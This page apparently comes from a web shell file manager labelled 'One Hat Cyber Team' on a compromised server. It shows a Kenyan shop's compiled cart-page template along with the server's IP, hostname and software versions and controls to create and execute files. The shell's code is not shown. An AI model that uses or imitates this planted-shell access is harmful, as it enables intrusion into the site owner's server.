⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.219
Server IP:
15.204.235.159
Server:
Linux srv.techlup.co.ke 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
tech
/
www
/
script
/
storage
/
framework
/
views
/
View File Name :
bae37663ccf502cd5d8b0e574ae446cf6ec221f6.php
<?php $__env->startSection('content'); ?> <!-- slider area start --> <section id="cart_breadcrumb"> <div class="slider-area breadcrumb" id="cart_breadcrumb_bg_img" style="background-image: url(<?php echo e(asset(content('cart_breadcrumb','cart_breadcrumb_bg_img'))); ?>);"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="breadcrumb-area text-center"> <h3 id="cart_breadcrumb_title"><?php echo e(content('cart_breadcrumb','cart_breadcrumb_title')); ?></h3> <div class="breadcrump-title"> <span id="cart_breadcrumb_des"><?php echo e(content('cart_breadcrumb','cart_breadcrumb_des')); ?></span> </div> </div> </div> </div> </div> </div> </section> <!-- slider area end --> <?php if(Cart::count() > 0): ?> <!-- cart area start --> <section> <div class="cart-area pt-100 pb-100" id="cart"> <div class="container"> <div class="row"> <div class="col"> <div class="cart-title"> <h3 id="cart_title"><?php echo e(content('cart','cart_title')); ?></h3> </div> </div> </div> <div class="row pt-20"> <div class="col-lg-12"> <div class="cart-table table-responsive"> <table class="table table-bordered"> <thead class="text-center"> <tr> <th class="pro-remove"></th> <th class="pro-thumbnail"><?php echo e(__('Image')); ?></th> <th class="pro-title"><?php echo e(__('Product')); ?></th> <th class="pro-price"><?php echo e(__('Price')); ?></th> <th class="pro-quantity"><?php echo e(__('Quantity')); ?></th> <th class="pro-subtotal"><?php echo e(__('Total')); ?></th> </tr> </thead> <tbody class="text-center"> <input type="hidden" id="remove_cart" value="<?php echo e(route('product.cart.remove')); ?>"> <input type="hidden" id="cart_update" value="<?php echo e(route('product.cart.update')); ?>"> <?php $ecom_settings=LpOption('ecommerce'); ?> <?php $__currentLoopData = Cart::content(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $cart): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <td class="pro-remove"> <a href="javascript:void(0)" onclick="remove_cart('<?php echo e($cart->rowId); ?>')"><i class="far fa-trash-alt"></i></a> </td> <td class="pro-thumbnail"> <a href="#"> <img src="<?php echo e(asset(App\Meta::where('term_id',$cart->id)->first()->preview)); ?>" alt=""> </a> </td> <td class="pro-title"> <a href="#"><?php echo e($cart->name); ?></a> </td> <td class="pro-price"> <span>KES<?php echo e($cart->price); ?></span> </td> <td class="pro-quantity"> <div class="pro-qty"> <div class="count-input-block"> <input type="number" min="1" id="product_qty<?php echo e($cart->rowId); ?>" onchange="cart_update('<?php echo e($cart->rowId); ?>')" class="form-control text-center" value="<?php echo e($cart->qty); ?>"> </div> </div> </td> <td class="pro-subtotal"><span>KES<?php echo e($cart->total); ?></span></td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <tr> <td class="pro-total-title" colspan="5">Total Price</td> <td class="pro-total-price">KES<?php echo e(Cart::total()); ?></td> </tr> </tbody> </table> </div> </div> </div> <div class="row"> <div class="col"> <div class="cart-link f-right mt-4"> <a href="<?php echo e(url('shop')); ?>" class="btn-custom mr-3 shopping" id="cart_shopping_title"><?php echo e(content('cart','cart_shopping_title')); ?></a> <a href="<?php echo e(url('checkout')); ?>" class="btn-custom" id="checkout_title"><?php echo e(content('cart','checkout_title')); ?></a> </div> </div> </div> </div> </div> </section> <!-- cart area end --> <?php else: ?> <div class="cart-not-found text-center pt-100 pb-100"> <h2>Cart Not Found</h2> </div> <?php endif; ?> <!-- quote area start --> <section id="cart_quote"> <div class="quote-area pb-100"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="quote-info text-center"> <h2 id="cart_quote_title"><?php echo e(content('cart_quote','cart_quote_title')); ?></h2> <p id="cart_quote_description"><?php echo e(content('cart_quote','cart_quote_description')); ?></p> <a href="<?php echo e(url('contact')); ?>" id="cart_quote_button"><?php echo e(content('cart_quote','cart_quote_button')); ?></a> </div> </div> </div> </div> </div> </section> <!-- quote area end --> <?php $basic_info=LpOption('system_basic_info'); ?> <?php if(!empty($basic_info->gallary_input)): ?> <?php $gallery=explode(',', $basic_info->gallary_input); ?> <!-- band area start --> <section id="band"> <div class="band-area pt-100 pb-100"> <div class="container"> <div class="row owl-carousel2 owl-carousel"> <?php $__currentLoopData = $gallery; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $row): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="col-lg-12"> <div class="band-img"> <img id="band_first_img" src="<?php echo e(asset($row)); ?>" alt=""> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> </div> </div> </section> <?php endif; ?> <!-- band area end --> <?php $__env->stopSection(); ?> <?php $__env->startPush('js'); ?> <script> // $("body").on("contextmenu",function(e){ return false; }); $(document).keydown(function(e){ if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)){ return false; } if(e.which === 123){ return false; } if(e.metaKey){ return false; } //document.onkeydown = function(e) { // "I" key if (e.ctrlKey && e.shiftKey && e.keyCode == 73) { return false; } // "J" key if (e.ctrlKey && e.shiftKey && e.keyCode == 74) { return false; } // "S" key + macOS if (e.keyCode == 83 && (navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)) { return false; } if (e.keyCode == 224 && (navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)) { return false; } // "U" key if (e.ctrlKey && e.keyCode == 85) { return false; } // "F12" key if (event.keyCode == 123) { return false; } </script> <?php $__env->stopPush(); ?> <?php echo $__env->make('theme::layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/tech/staging.techlup.co.ke/files/script/am-content/Themes/monkey/views/cart/index.blade.php ENDPATH**/ ?>